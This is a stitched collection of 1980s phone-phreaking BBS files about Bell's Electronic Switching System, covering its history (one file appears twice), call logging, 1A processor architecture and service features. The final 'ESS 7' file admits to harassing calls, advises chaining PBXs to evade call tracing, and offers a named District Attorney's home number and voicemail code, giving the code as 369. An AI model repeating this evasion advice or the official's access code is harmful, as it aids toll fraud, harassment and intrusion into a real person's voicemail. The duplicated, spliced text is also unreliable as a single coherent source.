$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
Of all the new 1960s wonders of
telephone technology - satelites, ultra
modern Traffic Service Positions (TSPS)
for operators, the picturephone, and
so on - the one that gave Bell Labs the
most trouble, and unexpectedly became
the greatest development effort in
Bell System's history, was the
perfection of an electronic switching
system, or ESS.
It may be recalled that such a
system was the specific end in view
when the project that had culminated
in the invention of the transistor had
been launched back in the 1930s. After
successful accomplishment of that
planned miracle in 1947-48, further
delays were brought about by financial
stringency and the need for further
development of the transistor itself.
In the early 1950s, a Labs team began
serious work on electronic swithcing.
As early as 1955, Western Electric
became involved when five engineers
from the Hawthorne works were assigned
to collaborate with the Labs on the
project. The president of AT&T in 1956,
wrote confidently, "At Bell Labs,
developement of the new electronic
switching system is going full speed
ahead. We are sure this will lead to
many improvements in service and also
to greater efficiency. The first
service trial will start in Morris,
Ill., in 1959." Shortly thereafter,
Kappel said that the cost of the whole
project would probably be $45 million.
But it gradually became apparent
that the developement of a commercially
usable electronic switching system -
in effect, a computerized telephone
exchange - presented vastly greater
technical problems than had been
anticipated, and that, accordingly,
Bell Labs had vastly underestimated
both the time and the investment needed
to do the job. The year 1959 passed
without the promised first trial at
Morris, Illinois; it was finally made
in November 1960, and quickly showed
how much more work remained to be done.
As time dragged on and costs mounted,
there was a concern at AT&T and some-
thing approaching panic at Bell Labs.
But the project had to go forward; by
this time the investment was too great
to be sacrificed, and in any case,
forward projections of increased
demand for telephone service indicated
that within a phew years a time would
come when, without the quantum leap
in speed and flexibility thaty
electronic switching would provide, the
national network would be unable to
meet the demand. In November 1963, an
all-electronic switching system went
into use at the Brown Engineering
Company at Cocoa Beach, Florida. But
this was a small installation,
essentially another test installation,
serving only a single company. Kappel's
tone on the subject in the 1964 annual
report was, for him, an almost
apologetic: "Electronic switching
equipment must be manufactured in
volume to unprecedented standards of
reliability.... To turn out the
equipment economically and with good
speed, mass production methods must
be developed; but, at the same time,
there can be no loss of precision..."
Another year and millions of dollars
later, on May 30, 1965, the first
commercial electric centeral office
was put into service at Succasunna,
New Jersey.
Even at Succasunna, only 200 of the
town's 4,300 subscribers initially had
the benefit of electronic switching's
added speed and addItional services,
such as provision for three party
conversations and automatic transfer
of incoming calls. But after that, ESS
was on its way. In January 1966, the
second commercial installation, this
one serving 2,900 telephones, went into
service in Chase, Maryland. By the end
of 1967 there were additional ESS
offices in California, Connecticut,
Minnesota, Georgia, New York, Florida,
and Pennsylvania; by the end of 1970
there were 120 offices serving 1.8
million customers; and by 1974 there
were 475 offices serving 5.6 million
customers.
The difference between conventional
switching and electronic switching
is the difference between "hardware"
and "software"; in the former case,
maintenence is done on the spot, with
screwdriver and pliers, while in the
case of electronic switching, it can
be done remotely, by computer, from
a centeral point, making it possible
to have only one or two technicians
on duty at a time at each switching
center.
The development program, when
the final figures were added up, was
found to have required a staggering
four thousand man-years of work at
Bell Labs and to have cost not
$45 million but $500 million!
The End
Lex Luthor
[Courtesy of: Sherwood Forest ][]
[914/359-1517]
[1-34, Last=26, Quit=Q] Read File #

+204
View File
@@ -0,0 +1,204 @@
TO PAUSE S TO STOP ---(==
$+$+$+$+$+$+$+$+$+$+$+$+$+$+$+$+$+$+$
$ Electronic Switching System $
$ From 2600 mag. Feb '84 $
$+$+$+$+$+$+$+$+$+$+$+$+$+$+$+$+$+$+$
(Courtesy of Black Knight)
THERE WAS OF COURSE NO WAY OF KNOWING
WETHER YOU WERE BEING WATCHED AT ANY
OMENT. HOW OFTEN, OR ON WHAT
SYSTEM, THE THOUGHT POLICE PLUGGED IN ON
ANY INDIVIDUAL WIRE WAS GUESSWORK. IT
WAS EVEN CONCEIVABLE THAT THEY WATCHED
EVERYBODY ALL THE TIME. BUT AT ANY RAT
E THEY COULD PLUG IN YOUR WIRE WHENEVER
THEY WANTED TO. YOU HAD TO LIVE--DID L
IVE, FROM HABIT THAT BECAME INSTICT--IN
THE ASSUMPTION THAT EVERY SOUND YOU MAD
E WAS OVERHEARD, AND, EXCEPT IN
DARKNESS, EVERY MOVEMENT SCRUTINIZED.
'FROM NINETEEN EIGHTY-FOUR'
ESS IS THE BIG BROTHER OF THE BELL
FAMILY. ITS VERY NAME STRIKES FEAR AND
APPREHENSION INTO THE HEARTS OF MOST
PHREAKERS, AND FOR A VERY GOOD REASON.
ESS (ELECTRONIC SWITCHING SYSTEM) KNOWS
THE FULL STORY ON EVERY TELEPHONE
HOOKED INTO IT. WHILE IT MAY BE PARANO
ID TO SAY THAT ALL PHREAKING WILL COME
TO A SCREECHING HALT UNDER ESS, IT'S
CERTAINLY REALISTIC TO ADMIT THAT ANY
PHREAK WHOSE CENTRAL OFFICE TURNS TO
ESS WILL HAVE TO BA A LOT MORE CAREFUL.
HERE'S WHY.
WITH ELECTRONIC SWITCHING, EVERY
SINGLE DIGIT DIALED IS RECORDED. THIS
IS USEFUL NOT ONLY FOR NAILING PHREAKS
BUT FOR SETTLING BILLING DISPUTES. IN
THE PAST, THERE HAS BEEN NO EASY WAY
FOR THE PHONE COMPANY TO SHOW YOU WHAT
NUMBERS YOU DIALED LOCALLY. IF YOU
PROTESTED LONG ENOUGH AND LOUD ENOUGH,
THEY MIGHT HAVE PUT A PEN REGISTER ON
YOUR LINE TO RECORD EVERYTHING AND
PROVE IT TO YOU. UNDER ESS, THE ACTUAL
PRINTOUT (WHICH WILL BE DUG OUT OF A
VAULT SOMEWHERE IF NEEDED) SHOWS EVERY
LAST DIGIT DIALED.
EVERY 800 CALL, EVERY CALL TO DIRECTORY
ASSISTANCE, REPAIR SERVICE, THE
OPERATOR, EVERY RENDITION OF THE 1812
OVERTURE, EVERYTHING! HERE IS AN
EXAMPLE OF A TYPICAL PRINTOUT, WHICH
SHOWS TIME OF CONNECT, LENGTH OF
CONNECT, AND NUMBER CALLED.
DATE TIME LENGTH UNITS NUMBER
0603 1518 3 1 456-7890
0603 1525 5 3 345-6789
0603 1602 1 0 000-4011
0603 1603 1 0 800-555-1212
0603 1603 10 2.35* 212-345-6789
0603 1624 1 0 000-000-0000
(TSPS)
A THOUSAND CALLS TO "800" WILL SHOW
UP AS JUST THAT--A THOUSAND CALLS TO
"800"! EVERY TOUCH TONE OR PULSE IS
KEPT TRACK OF AND FOR MOST PHREAKS,
THIS IN ITSELF WON'T BE VERY PRETTY.
SOMEWHERE IN THE HALLOWED HALLS OF 19
5 BROADWAY, A TRAFFIC ENGINEER DID AN
EXHAUSTIVE STUDY OF ALL 800 CALLS OVER
THE PAST FEW YEARS, AND REACHED THE
FOLLOWING CONCLUSIONS: (1) LEGITIMATE
CALLS TO 800 NUMBERS LAST AN AVERAGE OF
3 MINUTES OR LESS. OF THE ILLEGAL (I.E
PHREAKERS) CALLS MADE VIA 800 LINES,
MORE THAN 80% LASTED 5 MINUTES/LONGER;
(2) THE AVERAGE RESIDENTIAL TELEPHONE
SUBSCRIBER MAKES FIVE SUCH CALLS TO AN
800 NUMBER PER MONTH. WHENEVER
PHREAKERS ARE BEING WATCHED, THAT
NUMBER WAS SIGNIFICANTLY HIGHER. AS A
RESULT OF THIS STUDY, ONE FEATURE OF
ESS IS A DAILY LOG CALLED THE "800
EXCEPTIONAL CALLING REPORT."
UNDER ESS, ONE SIMPLY DOES NOT PLACE
A 2600 HZ TONE ON THE LINE, UNLESS OF
COURSE, THEY WANT A TELCO SECURITY
REPRESENTATIVE AND A POLICEMAN AT THEIR
DOORWITHIN AN HOUR! THE NEW GENERICS
OF ESS (THE #5) NOW IN PRODUCTION, WITH
AN OPERATING PROTOTYPE IN GENEVA, ILL,
ALLOW THE SYSTEM TO SILENTLY DETECT ALL
"FOREIGN" TONES NOT AVAILABLE ON THE
CUSTOMER'S PHONE. YOU HAVE EXACTLY 12
BUTTONS ON YOUR TOUCH-TONE (R) PHONE.
ESS KNOWS WHAT THEY ARE, AND YOU HAD
BEST NOT SOUND ANY OTHER TONES ON THE
LINE, SINCE THE NEW #5 IS PROGRAMMED
TO SILENTLY NOTIFY A HUMAN BEING IN THE
CENTRAL OFFICE, WHILE CONTINUING WITH
YOUR CALL AS THOUGH NOTHING WERE WRONG!
SOMEONE WILL JUST PUNCH A FEW KEYS ON
THEIR TERMINAL, AND THE WHOLE SORDID
STORY WILL BE RIGHT IN FRONT OF THEM, &
PRINTED OUT FOR ACTION BY THE SECURITY
REPRESENTATIVES AS NEEDED.
TRACING OF CALLS FOR WHATEVER REASON
(ABUSIVE CALLS, FRAUD CALLS, ETC.) IS
DONE BY MERELY ASKING THE COMPUTER
RIGHT FROM A TERMINAL IN THE SECURITY
DEPARTMENT. WITH ESS, EVERYTHING IS RI
GHT UP FRONT, NOTHING HIDDEN OR
CONCEALED IN ELECTROMECHANICAL FRAMES,
ETC. IT'S MERELY A SOFTWARE PROGRAM!
AND A PROGRAM DESIGNED FOR EASE IN
OPERATION BY THE PHONE COMPANY. CALL
TRACING HAS BECOME VERY SOPHISTICATED A
ND IMMEDIATE. THERE'S NO MORE RUNNING
IN THE FRAMES AND LOOKING FOR LONG PERI
ODS OF TIME. ROM CHIPS IN COMPUTERS
WORK FAST, AND THAT IS WHAT ESS IS ALL
ABOUT.
PHONE PHREAKS ARE NOT THE ONLY REASON
FOR ESS, BUT IT WAS ONE VERY IMPORTANT
ONE. THE FIRST AND FOREMOST REASON FOR
ESS IS TO PROVIDE THE PHONE COMPANY
WITH BETTER CONTROL ON BILLING AND
EQUIPMENT RECORDS, FASTER HANDLING OF
CALLS (I.E. LESS EQUIPMENT TIED UP IN
THE OFF ICE AT ANY ONE TIME), & TO HELP
AGENCIES SUCH AS THE FBI KEEP BETTER
ACCOUNT OF WHO WAS CALLING WHO FROM
WHERE,ETC. WHEN THE FBI FINDS OUT THAT
SOMEONE WHOSE CALLS THEY WANT TO TRACE
IS ON A ESS EXCHANGE, THEY ARE THRILLED
BECAUSE IT'S SO MUCH EASIER FOR THEM
THEN.
THE UNITED STATES WON'T BE 100% ESS
UNTIL SOMETIME IN THE MID 1990'S. BUT
IN REAL PRACTICE, ALL PHONE OFFICES IN
ALMOST EVERY CITY ARE GETTING SOME OF
THE MOST BASIC MODIFICATIONS BROUGHT
ABOUT BY ESS. "911" SERVICE IS AN ESS
FUNCTION. SO IS ANI (AUTOMATIC NUMBER
IDENTIFICATION) ON LONG DISTANCE CALLS.
"DIAL TONE FIRST" PAY PHONES ARE ALSO
AN ESS FUNCTION. NONE OF THESE THINGS
WERE AVAILABLE PRIOR TO ESS. THE AMOUNT
OF PURE FRAUD CALLING VIA BOGUS CREDIT
CARD, THIRD NUMBER BILLING, ETC. ON
BELL'S LINES LED TO THE DECISION TO
RAPIDLY INSTALL THE ANI, FOR EXAMPLE,
EVEN IF THE REST OF THE ESS WAS SEVERAL
YEARS AWAY IN SOME CASES.
DEPENDING ON HOW YOU CHOOSE TO LOOK
AT THE WHOLE CONCEPT OF ESS, IT CAN BE
EITHER ONE OF THE MOST ADVANTAGEOUS
INNOVATIONS OF ALL TIME OR ONE OF THE
SCARIEST. THE SYSTEM IS GOOD FOR
CONSUMERS IN THAT IT CAN TAKE A LOT OF
ACTIVITY AND DO LOTS OF THINGS THAT OLD
ER SYSTEMS COULD NEVER DO. FEATURES
SUCH AS DIRECT DIALING OVERSEAS, CALL
FORWARDING (BOTH OF WHICH OPEN UP NEW
WORLDS OF PHREAKING WHICH WE'LL EXPLORE
IN LATER ISSUES), AND CALL HOLDING ARE
STEPS FORWARD, WITHOUT QUESTION. BUT
AT THE SAME TIME, WHAT DO ALL OF THE
NASTY IMPLICATIONS MENTIONED FURTHER
BACK MEAN TO THE AVERAGE PERSON ON THE
SIDEWALK? THE SYSTEM IS PERFECTLY
CAPABLE OF MONITORING ANYONE, NOT JUST
PHONE PHREAKS! WHAT WOULD HAPPEN IF
THE NICE FRIENDLY GOVERNMENT WE HAVE
SOMEHOW GOT OVERTHROWN AND A MEAN NASTY
ONE TOOK ITS PLACE? WITH ESS, THEY
WOULDN'T HAVE TO DO TOO MUCH WORK, JUST
COME UP WITH SOME NEW SOFTWARE. IMAGINE
A PHONE SYSTEM THAT COULD TELL
AUTHORITIES HOW MANY CALLS YOU PLACED
TO CERTAIN TYPES OF PEOPLE, I.E. BLACKS
COMMUNISTS, LAUNDROMAT SERVICE
EMPLOYEES... ESS COULD DO IT, IF SO
PROGRAMMED.
*** BIOC
*** AGENT 003
Downloaded From P-80 Systems.....
+163
View File
@@ -0,0 +1,163 @@
File: A HISTORY OF ESS
Read 15 times
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
$ $
$ THE HISTORY OF ESS $
$ --- ------- -- --- $
$ $
$ $
$ An original phile by: $
$ $
$ $
$$$$$$$$$$$$-=>Lex Luthor<=-$$$$$$$$$$$
$ $
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
Of all the new 1960s wonders of
telephone technology - satelites, ultra
modern Traffic Service Positions (TSPS)
for operators, the picturephone, and
so on - the one that gave Bell Labs the
most trouble, and unexpectedly became
the greatest development effort in
Bell System's history, was the
perfection of an electronic switching
system, or ESS.
It may be recalled that such a
system was the specific end in view
when the project that had culminated
in the invention of the transistor had
been launched back in the 1930s. After
successful accomplishment of that
planned miracle in 1947-48, further
delays were brought about by financial
stringency and the need for further
development of the transistor itself.
In the early 1950s, a Labs team began
serious work on electronic swithcing.
As early as 1955, Western Electric
became involved when five engineers
from the Hawthorne works were assigned
to collaborate with the Labs on the
project. The president of AT&T in 1956,
wrote confidently, "At Bell Labs,
developement of the new electronic
switching system is going full speed
ahead. We are sure this will lead to
many improvements in service and also
to greater efficiency. The first
service trial will start in Morris,
Ill., in 1959." Shortly thereafter,
Kappel said that the cost of the whole
project would probably be $45 million.
But it gradually became apparent
that the developement of a commercially
usable electronic switching system -
in effect, a computerized telephone
exchange - presented vastly greater
technical problems than had been
anticipated, and that, accordingly,
Bell Labs had vastly underestimated
both the time and the investment needed
to do the job. The year 1959 passed
without the promised first trial at
Morris, Illinois; it was finally made
in November 1960, and quickly showed
how much more work remained to be done.
As time dragged on and costs mounted,
there was a concern at AT&T and some-
thing approaching panic at Bell Labs.
But the project had to go forward; by
this time the investment was too great
to be sacrificed, and in any case,
forward projections of increased
demand for telephone service indicated
that within a phew years a time would
come when, without the quantum leap
in speed and flexibility thaty
electronic switching would provide, the
national network would be unable to
meet the demand. In November 1963, an
all-electronic switching system went
into use at the Brown Engineering
Company at Cocoa Beach, Florida. But
this was a small installation,
essentially another test installation,
serving only a single company. Kappel's
tone on the subject in the 1964 annual
report was, for him, an almost
apologetic: "Electronic switching
equipment must be manufactured in
volume to unprecedented standards of
reliability.... To turn out the
equipment economically and with good
speed, mass production methods must
be developed; but, at the same time,
there can be no loss of precision..."
Another year and millions of dollars
later, on May 30, 1965, the first
commercial electric centeral office
was put into service at Succasunna,
New Jersey.
Even at Succasunna, only 200 of the
town's 4,300 subscribers initially had
the benefit of electronic switching's
added speed and addItional services,
such as provision for three party
conversations and automatic transfer
of incoming calls. But after that, ESS
was on its way. In January 1966, the
second commercial installation, this
one serving 2,900 telephones, went into
service in Chase, Maryland. By the end
of 1967 there were additional ESS
offices in California, Connecticut,
Minnesota, Georgia, New York, Florida,
and Pennsylvania; by the end of 1970
there were 120 offices serving 1.8
million customers; and by 1974 there
were 475 offices serving 5.6 million
customers.
The difference between conventional
switching and electronic switching
is the difference between "hardware"
and "software"; in the former case,
maintenence is done on the spot, with
screwdriver and pliers, while in the
case of electronic switching, it can
be done remotely, by computer, from
a centeral point, making it possible
to have only one or two technicians
on duty at a time at each switching
center.
The development program, when
the final figures were added up, was
found to have required a staggering
four thousand man-years of work at
Bell Labs and to have cost not
$45 million but $500 million!
The End
Lex Luthor
[Courtesy of: Sherwood Forest ][]
[914/359-1517]
[1-34, Last=26, Quit=Q] Read File #

+229
View File
@@ -0,0 +1,229 @@
WARNING........
THE FOLLOWING FILE IS NOT FOR THE NOVICE IN PHREAKING. YA WANT TO KNOW HOW
TO GET YERSELF LD CODES, GO BOTHER YER LOCAL HACK/PHREAK BOARD FOR THAT.
NOW THEN........
<-><-><-><-><-><-><-><-><-><-><-><-><-><-><-><-><-><-><-><-><-><-><-><-><-><->
<-> <->
<-> The Phreaker's Guide to <->
<-> ESS1 & 1A Switching Systems <->
<-> <->
<-> Researched and Compiled by <->
<-> -=+NINJA MASTER+=- <->
<-> <->
<-> 5/10/87 <->
<-> _______ <->
<-> |File #1| <->
<-> ------- <->
<-><-><-><-><-><-><-><-><-><-><-><-><-><-><-><-><-><-><-><-><-><-><-><-><-><->
<-> "Forever Servicing The Phreak/Hack Community" <->
<-><-><-><-><-><-><-><-><-><-><-><-><-><-><-><-><-><-><-><-><-><-><-><-><-><->
Hello, and welcome to the first in a continuing series on the ESS1 and 1A
switching systems. The information in this series had been obtained from my
knowledge and by trashing various empire (AT&T,BELL) trash binns.
In this first file I will start off with a very basic review of what the
ESS system is, and will then go on to talk about some other things you
will find interesting.
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
The ESS System In Review
------------------------
ESS (Which stands for Electronic Switching System) was designed by good old
AT&T in the state of the art labs of the computer-controlled space-division.
The principle is simple, you have a switching system that is controlled by
simple electronics and stored computer programs. (not to be confused with
CCIS which is just a interoffice command link).
The ESS system is a class 5(End Office) system, and has some spinoffs (like
the No. 10A RSS [Remote Switching System]). It uses digital transmissions,
although they must be converted to analog by a hybrid as this is what kind of
electronics AT&T chose to use.
The ESS is divided in to seperate modules, so as to make repairs and additions
easier. Each module is connected to the system by interfaces (one of which
will be covered later). In a whole, the ESS system provides the standard
BORSCHT functions, plus some extra ones.
Well, them there's the basics, now on with the good, technical, informational,
fun stuff.........
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
ESS1A Procesor
--------------
The follwing is about the 1A Processor, and will give you an understanding
on how it functions.
The 1A processor is used for a number of ESS systems, but most specifically
is used for the following:
o To control the 4 ESS switch.
o To control the 1A ESS switch.
o To be added to older 1 ESS switches, so as to update it to a 1A ESS.
o To support future switching systems.
o To accommodate bulk memory systems.
o And to provide real time and continuous control through highly automatic
maintenance. (less than 2 hours downtime in 40 years continuous operation).
The 1A processor uses stored programs, and operates in a real time environment.
The processor can function without being hooked up to the switching network.
The processor is devoted to internal maintenance and administrative tasks. So
TELCO employe's can monitor the processor (from now on called the 1A) it is
hooked up to control panels and to I/O terminals. (which, incidentally
interface with software defined I/O channels).
All frames (they make up the 1A) sent out from the 1A are duplicated.
So that a failure from one won't screw up and equipment.
The following is a high level block diagram of the 1A:
_________
|Attached |
|Processor|_________
|System | |
--------- |
|
| ___________
___________ | | |
| | ^ | Auxiliary |
| File Store|----< <-------------------*-----------------| Data |
| | | | System |
----------- | | |
| -----------
|
|
| AU BUS
|
|
___________ __________|_________ ____________
| | | | | |
| Program | PS Bus | Central | CS Bus | Call Store |
| Store |---------------| Control |-------------| |
| | | | ------------
----------- ----------|---------
|
| PU Bus ___________ Data and
| | | control
*------------| I/O |-------------
| | Interface | to/from
| | | I/O
| ----------- terminals
| |
| |
| |E2A Telemetry
| PU Bus |Control
| |
Status | |
_________ And ________|_______ |
| | Control | |<---------- Pu Bus To/From
| Control |-------------------| Periphel |--------------------------using
| Panels | | System | system
| | | Interface | peripheal
--------- | |
| | E2A Telemetry Control Inhibit
to No. 2 Telemetry Data | |<----------------------\
SCCS And Control | | | From
Maintenance-------------------| |<--Office--Alarms-------|Using
Facility | | |System
| |<--Building--Alarms----/
| |
----------------
LEGEND
------
AU--Auxiliary Unit
CS--Call Store
PS--Program Store
PU--Peripheral Unit
SCCS--Switching Control Center System
About the above:
Central Control: Interfaces with the 1A, and performs the processing functions
of the 1A. It also executes all maintenance routines.
Program Store: High speed semiconductor that stores program instructions, and
system configuration system.
Call Store: Similar to the above, but is used for storage translation data,
and frequently changed call processing data, such as:
o Status of trunks and switching network.
o Records of network terminations used for each call in progress.
o Digits received and digits to be outpulsed.
o Maintenance data related to programmed diagnostic tests.
Call store also includes an emergency system recovery program, used to
establish a working system of a program store failure.
File Store: Magnetic disk memory, used for program backup.
Attached Processor System: 3B20D computer, of which one or more are used as
slave processors (used for multitasking, ect.)
Auxillary Data System: Magnetic tape system used to store and retrieve data
such as system reinitialization, memory dumps, ect......
I/O interface: Used to connect 1A to terminals used to input control mesages,
and to recieve status messages.
Peripheral System Interface: Serves as the main junction between all
peripherals.
Control Panels: An additional I/O device used to monitor the 1A, and to
exercise manual control over the 1A.
(Yes, this is the big computer you've all seen before,
compleat with blinking lights, and little switches)
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Well, that's it for this file. If anyone wants more detailed info such as
system schematics, address spectrums, ect... then leave me mail on any of the
boards listed at the end of this file.
*Next file: Mobile Bandits (Those good old mobile switching systems).*
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Any comments, questions, ect.... you can reach me on the following boards:
Ripco Crowley Manor Phreak Klass 2600
Skidds Lab Music Playground Pandemonium
[*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*]
[*] A /\/\aster \/\/orks II Presentation [*]
[*] Copyright 1987 [*]
[*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*]

+129
View File
@@ -0,0 +1,129 @@
File: ESS ADVANTAGES
Read 15 times
*******************************************************************************
* *
* Electronic Switching Advances *
* [2600 -- June 1984] *
* *
*******************************************************************************
Despite Obvious Drawbacks, ESS has quite a few nice features
Although most phreaks tend to look upon Electronic Switching Systems with
loathing and dread, they are admittedly fascinating animals to study. The
smooth sophistication of an ESS office, small machines purring away in contrast
to the deafening din of step or crossbar offices, the conspicuous lack of
relays, the presence of software, the calm, controlled, atmosphere.
Horrible, isn't it? Yes, quite, but still anyone who claims to be
interested in phones must learn as much as possible about ESS. So this is a
rundown of some of the interesting things that ESS can do.
Here are a few that can be done in an ess office with individual lines that
are very difficult to arrange in crossbar types (the phone company likes to
refer to these as "classes of treatment"): *Line fixed for OUTGOING calls only.
Incoming calls are thrown to an intercept operator or recording. * Line fixed
for INCOMING calls only. Battery but no dial tone if reciver is lifted on
phone. * Line fixed for outgoing LOCAL calls only. Attempts to call the
operator rejected, as are calls with zero or one as the first digit. * Line
fixed for outgoing LONG DISTANCE only. Zero or one must be the first digit
dialed. * Line fixed for COLLECT calling only. Paid calls rejected, as are 3rd
number or credit card billings. (Used in prisons, jails, and other controlled
situations.) On these, zero is the only acceptable first digit to dial. * Line
fixed for OUTGOING CALLS REQUIRE I.D. (what used to be a "Q" number in manual
handling situations) Dial your call and enter a 4-6 digit personal code.
(Large companies make use of this to keep track of their employees' calls.)
It's said that there are about FIFTY classes of treatment, with class 1
being totally unrestricted (i.e. a "normal" line). As the numbers progress the
types of specialties change. About 20 "classes" are available, the remaining
30 or so are merely various combinations of the first 20 (outgoing calls only
and no long distance calls allowed, etc.). Around 85 percent of the phone
lines are just you average normal arrangement -- the other 15 percent are very
esoteric arrangements for super-large companies, institutions, government, etc.
Some other classes of treatment that are no problem for ESS to arrange are:
* Decline to accept operator assisted calls. The operator is unable to
intercept the line to test for busy or to interrupt in case of an emergency.
This feature shows up a lot on modem lines, since as many have found out, and
operator cutting in on data transmission will frequently wind up inadvertently
disconnecting the modem. * Hotel/motel service. A guest dials his/her calls
normalling, but TSPS will come on the line to take the room number or credit
card number without having to dial zero plus. TSPS sends the charges on "paid"
calls back to the hotel via a private line to either a Teletype machine or
billing equipment on the hotel premises. * Automatic reverse charges
accepted. This is your "800" service. Under ESS, it's possible to simply
take an ordinary line (a regular seven digit phone number) and assign an "800"
billing code to it. * Coin Service. This is your traditional "pay phone"
but in a new arrangement. Instead of a coin hitting a level which makes the
tip go to ground for a half second (ground start line), the ESS gives "dial
tone first" and instead of the five cent "ding" and the ten cent "ding ding"
and the twenty five cent "dong" as the coins are deposited, the coins being
deposited make certain frequencies on the line. ESS is told from a phone in
this "class of treatment" to expect these frequencies, etc.
The Touchtone Problem
As most phreaks already know, if a central office is set up for touchtone
service, then every line is set up for same. All one has to do to obtain
touchtone service is liberate a touchtone phone someplace. If the tones don't
sound when they're pressed, ehten the tip and ring are most likely reversed.
Change the position of the red/green (yellow/black) wires and the problem
should stop. But in ESS offices, you can forget it!!
In an ESS office, when you lift the receiver to make a call, you are
extended one of two types of line selectors. The one is for customers who have
paid for touchtone service. The other is for customers who are listed as
having rotary service. Oddly enough, when you reverse the tip/ring, you won't
gt the tones -- place them properly and you will get the tones -- but --
touchtones won't cut the dial tone in an ESS office unless you've paid for it!
This feature always causes huge problems whenever an office is cut over to
ESS. For various reasons, the phone company's outside plant records are
usually a complete shambles. They tend to keep very poor records about just
what is on the subscribers' premises. So what usually happens is thsi: a big
cpany that has their own centrex line opens it doors on Monday morning (most
ESS cut-overs take place on Sunday mornings to lessen the effect of any
interruption in service) and find that half of its touchtone phones don't work!
The phone companies records didn't say to set up those particular lines with
touchtone! Everyone has fun.
Let's Be Fair
For dedicated phreaks, ESS poses a number of serious problems. But, at the
same time, and awful lot of new features (i.e. toys) are making their way in
our direction, thanks to ESS. The increased ease in call supervision is one
feature you don't hear much about form the phone company and one that many of
us would prefer to do without. But there are these "good" things that the
telco uses as a selling point in ESS -- how beneficial these are to you, versus
the obvious disadvantages, you'll have to decide (even though it won't change a
thing).
* Call Forwarding: Forward incoming calls to whatever phone you want, local
or long distance. * Call Waiting: A tone comes on the line to let you know
that another call is trying to reach you while you're using the phone. * Three
Way Calling: Use the switchook to hold one party while bringing a third party
on lin. * Consulation Calling: Like three way, but you converrse privately
with a third person, hang up and get the first one back who had been waiting on
hold. * Speed Calling: Allows calls anywhere in the U.S. or Canada by dialing
just one digit and the star sign. * Store and Forward: If you can't reach
your party, you can dictate a voice message to the ESS computer. Tell the
computer to try every fifteen minutes until the party answers, then deliver
your recorded message to him. * Answering Service: Like a phone answering
machine, but it is in the computer! Dial a special code, dictate your
"answering service" message and hang up. If you don't answer after a set
number of rings, the computer will play your recording and take a message from
the caller!
Phone compnaies all over are finding that these "enhanced features" are big
sellers. In future issues, we'll discuss some of the bugs that have been found
in these features, and in ESS systems in general.
Sophisticated as it may seem, ESS is by no means perfect. <>
Courtesy of BIOC Agent 003 & Sherwood Forest ][ -- (914) 359-1517
-----End of File
Call The Works BBS - 1600+ Textfiles! - [914]/238-8195 - 300/1200 - Always Open

+82
View File
@@ -0,0 +1,82 @@
ESS 7 IS OUT!!!! ESS 7 IS OUT!!!! ESS 7 IS OUT!!!!
by: The Mortician [SWAT/PWA/ACiD/ADRENALINE/ConTrol Team]
The Villain [ACiD/NPi/AiR/PWA]
At this time the uses of ESS 7 are not known to us. We have discovered a
couple things though. One of the things we have found is *67. You might
call repair or an operator and ask them what *67 does. Your not going to
get very far unless you talk to an operator who know's what's up. We
called everywhere for about 3 hours until we finally got someone who knew
what was going on. Everyone else gave us the answer,"I'm sorry, but we are
not allowed to give out proprietary in formation."
So, we got ahold of a person in repair who was very helpful to us. The
person confirmed that yes, the Los Angeles area is running ESS 7 at this
time. Whoooa!! Wait a minute!! I didn't even know we had ESS 6 yet!
Obviously, Ma Bell is trying to keep this a secret, but of course, with
people like The Mortician and The Villain in the PHAC scene, they aren't
gonna get very far at keeping secrets (hehe, gotta put a plug in ). The
worst thing about ESS 7 is that it doesn't matter whether you use a PBX
or not. Pac Bell doesn't give a shit anymore. ESS 7 only knows two
things. The number YOUR calling from, and the number YOUR line (which you
dialed the number off of) is calling TO.
I understand completely how this works because I (The Mortician) was busted
for prank calling and changing the District Attorney of Pasadena's on the
same day which ESS 7 was put into use. I was the first one they got to
test their new system on. That's real nice to know.... The number I was
calling to had a call trap on it. It really didn't matter to me cause I
was using a few PBX's(3) to call to it. When the police came for me (while
I was at work...those fuckin assholes ....), I didn't say a damn word to
them. I did however convince them to let me see what evidence they had so
far on the case. It just so happens that they had the new Pac Bell ESS 7
crap printed out from the call trap. The only thing Pac Bell got was the
time the call started and how long it was for, and where the call started
and where it went to. ESS 7 didn't give a shit about the PBX's I called.
It doesn't matter anymore.
I hear that the one way to defeat it right now is to call a local PBX, then
from there call an OUT OF STATE PBX then call back to the number you want
to call from there. The good thing is that the police didn't even know I
used PBX's to make my calls because Pac Bell didn't report it since the new
ESS 7 doesn't concern itself with all the in between crap and it doesn't
monitor it. That's nice for me because they couldn't link me with any type
of phreaking. Anywayz, do what you will with this info, but keep it
undeground. They think this stuff is still secret, so as long as they
think we don't know anything, the longer we'll hav e to find ways around
it. Remember, none of the low level employees know about any of the new
commands yet or what they do. One of the operators we talked to said,
"hrmm, I don't know what *67 does, it must be one of the new functions.
We don't have anything listed on it yet." Of course, when I asked them
what it was a new function for, they told me to hold while they connected
me with a supervisor. We have confirmed that ESS 6 IS NOT IN!! It IS ESS
7! It took 3 hours for us to finally get this info, if you call and ask
what ESS they are using, they will give you a BS answer that it is private
info and they can't give it out. Unless you get in touch with an inside
person, or a really cool operator.
I figure they are keeping it secret because they don't think we know what's
going on. Then they are going to bust all the people who are dialing
through PBX's believing that it is diverting the call still. Sorry guys,
this is NOT ESS 5. You can forget it. They have your number, and the place
you called. The good t hing is that they won't have the PBX number so they
can't charge you with all that federal crap or whatever and if anyone shows
up it will be the local police(o r whatever police from the city you called
off the PBX). This is because the crime took place in their city. If you
need more info, or would just like the Pas adena DA's home phone number and
answer machine code(which by the way was 369 the last time I checked), then
